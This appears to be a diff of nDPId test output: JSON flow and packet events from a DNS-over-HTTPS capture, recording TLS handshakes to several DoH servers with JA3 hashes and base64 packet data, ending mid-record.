-00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":287,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739374011,"flow_last_seen":946739374011,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739374011,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04697{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":946739374036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3179,"pkt_l4_len":3145,"thread_ts_msec":946739374036,"pkt":"ZmZmZmZmRERERERECABFAAxdEw5AADYGP+x0yrAaCgAAAQG7qGI0lPLRVkdzGFAYAfXx8AAAFgMDAHoCAAB2AwMfdsQbzuiYRNDg0SBjCCwcHmnTX\/WaALeQBUBykWdcaiCY7MF+HV8NsAFc82xlqHj0YcQW9bewwKxZQwscQJJKphMCAAAuACsAAgMEADMAJAAdACCFS52dOnPWMZ+6KGOu9y\/QLNkNywSlNldrBcP9ygUsJBQDAwABARcDAwAkRYbUEe0KLtMYBo7DwIYWcyipqqBN\/bxVehyh0Sw6cb936jKFFwMDChoofwyGB1vpwXv7Xn4hXSbG1vtIeMernYPn5eAfJWckDiE1Vl5RxqW26TSWUTfmtG\/80SN\/HcC8sF8BZiFAAmCY47UJ7uXvVoDqw8BmwUzQhTAJ8CR9FaoGVeJsM5UnR3QsIEHqP5KqlB9iD+UdFFEShzmfIEBTbyB2lP4pQWBOWz2wOPIXZhQnKMJCxu1mnXifSB+KRolJ9fD2dQ4Cx5+85+F56fGG9StYfwFmGPIeJARJjwh49nZDI4iYWv+ddPBM2\/KJRuF+1TvTRam5R+I0m2+MFl1IOG\/mGs22lUpFRiEafHau8IgYwLtIsVJVRXeEF23eSSLjZSGlI+95kanzpb7Gq+bxaPB\/4KE\/EZB\/HHORaklfdEzQyROMT29wGcN987isDVey45rLfbLMKOZqZTAfIY9fCmEJfoMGXsfxScuGJL3kk9ktG5XOrDaDe+Mw8iBMs6aCgsJWCKp9AlmnI6jM+Pkj5pJEm1bom4ksHEDAz1NZ0ftN\/sVLZn9Ug2C7F7lT1GzkA6PKlKc6EZ2z5CZ6jJ2Z6Y6MlAZziPoOQu4qTh3J+nE8GcgGOJ+4zh9BbyrU\/zs1GjsbXVkHAo7jDaYOsfbK6OwpKfl4fhdC60RX1KjskIAX35OHA\/IXKzAnkgHHInCPGyjRoDeCN\/xxIMzVFrKXTCwf2SPOaQSeCd\/JvCgSVj\/dHhq8zdYnlFf+z9VXpf9xqp8dTGqqOXUGFnDAdjBQ71FnqfI6ubmeRFAjPpvyUbaEAnejXwHU9g6Nb1kInR39UeMaOlkv2XbX4eVVedQBnQ80TEebS+RYgvF4z+JaZdzTDBKsiCrr90MrJqELQ15ruqB7RM0T7bzUmBAp55RHbt\/ccY\/TkG\/gVsixMDlDFkIhMYt9MdUi87PoFTfnAamhlvAw7oZO8\/F7iHmtBa\/Ep7E0DP9U5QDAi98hWmChSAXTUreygTLQuqQnUJmosGexWw5Cm8TG3r4N5gnkEVB3HVNF0Bviuw4E\/LgbkZLCP6\/4igcruIsBRgEN00dS6JnGlucNL86jMmrPxWv6fGd6uX4GyIhA8xlh3VmZmkdtEaBCAvedT6MuQU0ug0OS0vhYWi4hpFSwBYkEc7nVVyMbvGRC\/t6cdur00RqtQCHbN+NyMsAYQCMLcN\/MBgJi53gtKoOeVRxL9efr0oSMfPFjg62k6KC1lR+0S5m3Izs0xuBIpZ4qwdqzDBYxqETxd2mAw6qyV9\/+c2vTZTjQfcpnp7y1uBxTcCkKvdXtnytMj88r6V3CNsrCqoiP+HgdZ35NIzfdjE8dt6Do9yQiQH9DyOtUx8mNKBWoW2GsDQem5ZGAtDwjmFRhkWEqvnuAWeKZRQvsxDNQX1VGCheiYk47AXsweypHM0kF7Sz+NMdgmJ2lYhFlZ1\/ixGlfZSk6mjv0hogoEvvV0z6\/T5ayYUiYrSxxE5CRTBXiQ0ShTnl8JnNrX5f1+PEHiTs9VmgpKgcqyhnAx43FvFz+tjAq2kHUpARsisN76U\/4szTnIzPWHuhFJGJXIYtA6KvZZsRr8X45Bjm7782fphZHssP9T11fz+rMBuNZkB+9kENQs834qUDrDWQYlgtgokMydJHahHIc4rs8RwpnWkwnfbjQyRwpkoSDjqKCsoWgqmckVcAlWtfj+PYNdYUV0GJVz3MaCILZ2I6i8QDOlFT6AvpNPYOGoGbJ0wKc\/iRHcSqwHkLOlqAj9rNOane\/dG8vbDHghfqFdeNPvQAcyGldxWfqiN032Vix7+oZXOFXeLNRXDRdMWbSqMlyCprTcKldxAe+jYGRK\/SRNNln4bS6loI5LqK5kRj1qHOQs4VYAvb6aRZkpJmFfA051r9ZTveZwX8QvPcsUhSp6WJroM5RdVgMoZWRw3V3kLzy526l\/XjarCqs7b9zg4\/0UThyCoRZXRIaapKAxcisr606oQ90EO6V1\/rxbH5QoNdmuIBJXUiCC+vi9DaFQhw7IS7rYl6bCaQkE1gKVqVjcfGFNbkwZ6WVIIFLAd4AULNZ0EbDr3Jxz4Q1Kv61lNl9GOAmC73UocSHTqPhV\/xb9YLlv4Qj8A9VyOXsI3ysVAT7Q3JqQoSzzANJennQVJORrvCGjBFhIJA1XuVUswlY7d8l6GIPFEndkzdJv+mqLebs92Ve7y8gHX+5\/N3bWQDbvROspZd9Rw2VYwhVeRkdNNkB9Zd4yf0MJA6FKQTPIvZ1j4Zvrf8Zqj1FK4+Pu5YWK2VzQ1bAzEZ5TAhqXro79v42FstXXH9Bjh6xGWnYs4EgdjNtrw9q9vDDHzkCgGXErTBS5tZpn4eq4iayRQKOUo2Bjzuikc3GCcT7DGLOzNijLOjpstykBtjYEBagL1lzeuQbGqMxLzwOzMZiM6Cr4dH6Ct7enfPKr1l7EDqLb80TAVFsE6E9zPStbSvvDsesVjI0LnHLpiFF3QD7w\/cMgXGCCQFz4kjOyjxN1ueQ3BiQwzUZI\/KQVjymbQQOaDcU\/hamroqvDR3psu8zkzqDRgXxZpAhYSs0ypnNhUomh4K+raYSufO72xoIxT3MchbmB2xOG+FHTInGWwMp665VQ8P5TZyqYPfZdJpda3UJ4l4i+8AGeTKq9cySdx4swdISz3V3xxrTEFxvjq7CgCc0mdfHRwUrslFZ\/8xz\/GkZ7unKM4nUXsR2wjAWglEejYWAjwBH57asssV4a1smVbgfitfljZxOQxeCULZkhU5iCbDWtt61dkKbIg6Z5Ib6wqsZbKsTNF5BUW\/OluqVhEnnxYi4bC2p8oeMOIg9Xp0ohk+2eyHzNnL7PsT\/0TJd+8z\/6rR4GfsNhau8JwG0sVxaM3gQ\/C1BUi59C0tclt8uqB8v4sL+nw1kYxtxvVF+WgZBhsUG6jtsTkz\/h7Vqr1uE1yqk6VMywMNzSK3C6Y5jNYNZlGRunhyx+Wvqoy4kyzKlb5KJu0D6Ibb9tx4jkjfsAgRv1kb1\/YV+5pR9kOWTI7kTR0GhRhEcYVSuszO6GztHF17jUv1HGqvUE2Y1nYTruioVBGxNU2n\/3D8R0H0Ev+WM\/lE1CkAFwkkBnRPnHTXpqQgZZhPNhQeacIL4PiCwXLGj68pqU9sBR5k+Qs1xeKaXL1uB\/+DlBrxDF37H0xYTjNyCifmppE9xs8wUURoGCYQz8YrJzWYbNTp6iS3VA9PqxHbxpwe+T0EJG3w+ckQ4AZZWQJfpeYEAjUJVTV+JzyForU6vnGB\/f4UtM5hkLlLR2yX4QW5z2sMH+oemvxHSO3c4dMYOamZjpEAr8HZR\/eYtA\/+k47KLbbuC8LadTWp9kx60hq9j0ZTOjnZRbmpU7x4+baRS3lSZ4uCKQhRDRs1bz+OmCsokrpdBvyRNmpmdHu7+xcAAbWr3GDiMDDj2MeLocIu6VxMJmWwaV6i6S3OZRKsCOQTd0Jkp8jCBeqO4YH7rnKVrcOwj8x\/xgYsXAwMBGfgS0Z5JTGD28Vyg2LfJHOWz9mr0ZY69GFX94xRplNLJ90YhSqkDA41SrPaRCa\/yRHZpmo6Z1mQO81cAsIuYw3\/dzrRByb+dTIlW9yt\/sOP7usPp6PbdD4rTPrbEK4QR\/+wMzHeanap2HaJcY2tnK9Pk6wr3URSABWoCiW8bBJ44gM\/wYSxUIN9fZQXNHmUFX2+4E+pzfHMX+TPSUHrGMWaQGF+jm8f8JzgtBamlKFf0T7ESBzmOVDFYKLq5HkwIpwu7FecWONEwB4QKksZp77Ks7VMI9z7kgYi8fKP1AlrK0wJXYhtL9bgNIor7UcK\/cBVJ2AclPTcIWxPGf\/H2qC2ccHzN2oQA1YRLpy6QS\/qocCCtoi9irrhlFwMDAEUNWvqMs\/h03WKKdBMbYkawhmSS9CnEEwNmSHsUo0aFsC+NuRuOS7d+gyt4adOBPfCXNUuX7r\/jeMTBHE2RkzGNnd\/d06g="} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739374011,"flow_last_seen":946739374036,"flow_idle_time":7580000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":3125,"flow_tot_l4_payload_len":3410,"flow_avg_l4_payload_len":1705,"midstream":1,"thread_ts_msec":946739374036,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"116.202.176.26","src_port":43106,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.libredns.gr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":946739374036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739374036,"pkt":"REREREREZmZmZmZmCABFAAB49DxAAH4GIqIKAAABdMqwGqhiAbtWR3MYNJT\/BlAYAfXmCwAAFAMDAAEBFwMDAEUX9381c\/+R1qgydby2LZz\/D1isDmITv8iB3tIfcLl3X1ZN85j+RzDG7ZR0PP5I0SioKkHY5OtmjMfBNJaLny9tLOB5RTM="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00853{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":946739378281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":344,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":344,"pkt_l4_len":310,"thread_ts_msec":946739378281,"pkt":"REREREREZmZmZmZmCABFAAFK6MRAAH4Gn0EKAAABVQVd5uaSAbv2ZmEwaR3\/oVAYAfZ05AAAFgMBAR0BAAEZAwPCcBaP\/DC8hVoTSokbsQvpjhaLnYrt7eKsiMQ8EXb5AyAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACqAAAAGQAXAAAUaWJrc3R1cm0uc3lub2xvZ3kubWUABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6FKiZGfISPafy0Na34RI3z\/9T8Zo5Ona0mhcVKXwyTI="} -00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":303,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378281,"flow_last_seen":946739378281,"flow_idle_time":7580000,"flow_min_l4_payload_len":290,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":290,"midstream":1,"thread_ts_msec":946739378281,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00592{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":946739378310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":946739378310,"pkt":"ZmZmZmZmRERERERECABFAACL5iJAADQG7KJVBV3mCgAAAQG75pJpHf+h9mZiUlAYAFOUtgAAFgMDAFgCAABUAwPPIa105ZphEb4djAIeZbiRwqIRFnq7jF4HngniyKgznCAAGOihE6CuqcDNXckkTdE7CmzbbGzUcC6GWkBVFb5CcRMCAAAMACsAAgMEADMAAgAZFAMDAAEB"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7580000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":304,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739378281,"flow_last_seen":946739378310,"flow_idle_time":7580000,"flow_min_l4_payload_len":99,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":389,"flow_avg_l4_payload_len":194,"midstream":1,"thread_ts_msec":946739378310,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":59026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ibksturm.synology.me","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":305,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":946739378311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":946739378311,"pkt":"REREREREZmZmZmZmCABFAAAu6MZAAH4GoFsKAAABVQVd5uaSAbv2ZmJSaR4ABFAYAfZzyAAAFAMDAAEB"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00845{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":946739378577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739378577,"pkt":"REREREREZmZmZmZmCABFAAFDLylAAH4Gh5EKAAABaBwcIoO8AbvZKqUSoyMYWVAYAfZGMAAAFgMBARYBAAESAwNktN1XF4bqrby0niN\/MgT4p6NPXKBlRwOJCoza94pvXyD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANanAudGlhcmFwLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBNe3CKgugpSU\/ahaeKXUN1ypv0O\/7wv4rJDS1FbyCQKA=="} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739378577,"flow_last_seen":946739378577,"flow_idle_time":7580000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739378577,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.28.34","src_port":33724,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiarap.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 03848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":946739378607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":2557,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2557,"pkt_l4_len":2523,"thread_ts_msec":946739378607,"pkt":"ZmZmZmZmRERERERECABFAAnv8ehAADcGAyZoHBwiCgAAAQG7g7yjIxhZ2SqmLVAYAEJO3AAAFgMDAHoCAAB2AwM5\/Tpf+0rVAVLiqp3AKzeP0oc5LUJ7LbPa16oj3TgNDiD9DZHEPvQMzjP6pbu5TmyGbnG5vDXlt6MJFI6XifT24xMBAAAuADMAJAAdACC6HV5GLKVmM89uM3s2SIWu43Lfyhq5unw8YJ6WUfrNYwArAAIDBBQDAwABARcDAwk9PLTYD+JT2QAppt0TUbAwAmxAstQCMsQy32ww9oSEEAAMGSMNt+TTdp0V3tZ3ctmeFKC8drVcJHMoKPW\/gLMtyIUmD\/3+eYMhUKtI+3FRz671m\/FiCxQ+DYhEAA2djrJV7bAD8riXyaqFyW2aaJF84flOMuq9DLwOUI0IypM1HnMNVT7vNmCordbJ4vYfoJCHZ3Jdxa1PMxflxUdqb7t2xbf5y\/m1Lgj+QBUEN2VGq3ZK1ktt1GgLlt5OMY6q\/EMncuhg\/OHccuz87CSxEURWL2O5XG3NQ8ZSkyDIF1XtrmR6FGXAhlzN0GIMFD4mIZ5QqyhyGprKsDD36CWqaTOR27WUIRMeWgua2kpjr+elVVRiIT0yfyvShMeR5KvvMj5AG9M4S4\/qWWxJjIv9qLfYm7RWSC4r34hNlFnFlqsqqqzzh\/BxMvV1bwxfAaqA1qBideWKRVA+7EuN95c4ue7X\/hRVHEx3iQLqTqKG9s8vcXeE42KLZOgVl3B7xu8\/i92\/WkhbHAp1VaoXVrJw6GLiISb\/po8DiOQt5NIdGX5eDQSEZ7O9baKasLWzq1YkwfZijF3n9KVs9qv2KSy5IfvS0SD4T0T96JowaLvO1lvBNbG7CindkMAn7au9+n1sxBnSgPOEhxjP6eP7I9klViNjl15nUFM6o4r0CQuVxRwVYjFh10tMhUtqr5ufjJtftBeIT7Z6ffMsMrzPdyzkIvDM+swGXo7V35YzVo8DyoBYe9uM0JJnrorf04OKftnG+pjuV1J118k\/TcF7dgWMascYwrYulqMRqr3vNGGbqZxylwmKp462M5UtGuo+qerBWSrRXWS6eh\/Pd34MrDX1VmvCOR23Z07RB6KZ9U0a03sYPKhsU\/m8X7Y3lJg3mFbu5qAjYzD1O+cD4Myf40iIoCP9xcs4bu1pUmgjVbsp3ut86GCDAgM+2h3m+dYO91dTNrC6JdnpsdKfoGqobbC1Nd6P0Kznfd6xn\/BQDvXNQHfd3IPzPYj2FRyDUuFDyWgT\/cwlGc7O60WUydzXXvs9ttqI8TuCUJYd1Ao8xx8mAgIvrwtyiwJR5QZQxYq0NnVo97JO1hRxuXJb+LTsywktm+cb6647KFCAIE22xi+EiXjOKZOlKgY\/++l2PKcbQh7+iHITgTYo09PyNcnTJxUwLKCZUcpj08uHLE+si9w6kmA+pKFDGKHD2OQi0\/dVl+2FqCH2+A3DCa2Gg9EWzElOrJ9mp3PsOzxGAh1T1616sYT0her6SVuXlhCGP0slwtRkTfN5tnJIo22tEgWtQ+b6y1PTsvRTouR9DpgUBw8BD3g0lRYqf3KAJIjUNpSvsRMGe0P3S4KCcJTz19EnjfZoP6uX+a1+4rjk2AihvF76LGF5wO7bsnmmIDYTvndhSZUKAm3a49yHTGG7gVwYkqmq0TRbx3kmFRXEBuvlULDIz+RlQyLwuJX5uRyHubvUf803FCAz\/4a9pnE6WEDc+zOoXHErWhAfoc5tjJI1gMxGX8U3yJwrwEtij2gQTn0Bbv4+6DXg8iV1mRetvz2V395BS+h9qVm0PJky45RjI5FxKVNW8VUHbBkrW32Ln2Pm3mojmUt+Xsx7zInkOkVoS97LxHGe13JTpikDPPGgpjpEoHIcQRKqtRb0XznaWZx01cfmn3isfcOxCOvXJUXQwHOBr0ZOeVU8JyV5j86F3c2x16THC9pMZadmbjMRbWkSLTw4DMHNpPKhS6WbcQJhxPZwfAVbKEjktlF0JguUnWmRyDWlD919TvF+XWK\/xSop+ME26vjlWYdWryJvX71XiN34ciEg6jsS9BSYdT6j+C8MLHQApTVrKIlUjg7LizXHOZ\/8TbPIjDL1MmbwanCPsnz+x51R4gaxLum0nLoSL+ZmdQWjq\/uyo2YE03WUuDCwEqP451PgmdaqLRPfWLB1DwCAkXZchOxevuMOjy